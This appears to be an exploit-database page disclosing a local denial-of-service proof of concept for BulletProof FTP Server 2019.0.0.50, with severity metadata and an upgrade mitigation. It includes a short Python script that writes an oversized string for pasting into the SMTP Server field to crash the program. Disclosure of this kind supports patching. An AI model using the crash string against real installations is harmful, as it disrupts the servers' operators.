header-logo
Suggest Exploit
vendor:
BulletProof FTP Server
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: BulletProof FTP Server
Affected Version From: 2019.0.0.50
Affected Version To: 2019.0.0.50
Patch Exists: Yes
Related CWE: N/A
CPE: a:bpftpserver:bulletproof_ftp_server
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64 Service Pack 1
2018

BulletProof FTP Server 2019.0.0.50 – Denial of Service (PoC)

A denial of service vulnerability exists in BulletProof FTP Server 2019.0.0.50 when a maliciously crafted payload is sent to the SMTP Server field. An attacker can leverage this vulnerability to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of BulletProof FTP Server.
Source

Exploit-DB raw data:

#Exploit Title: BulletProof FTP Server 2019.0.0.50 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-02-19
#Vendor Homepage: http://bpftpserver.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.50
#Tested on: Windows 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: BulletProof_FTP_Server_2019.0.0.50.py
#2.- Open bullet.txt and copy content to clipboard
#3.- Open BulletProof FTP Server
#4.- Select "Settings" > "SMTP"
#5.- In "Email Server" select "SMTP Server" and Paste Clipboard
#6.- Click on "Test"
#7.- Crashed

cod = "\x41" * 257

f = open('bullet.txt', 'w')
f.write(cod)
f.close()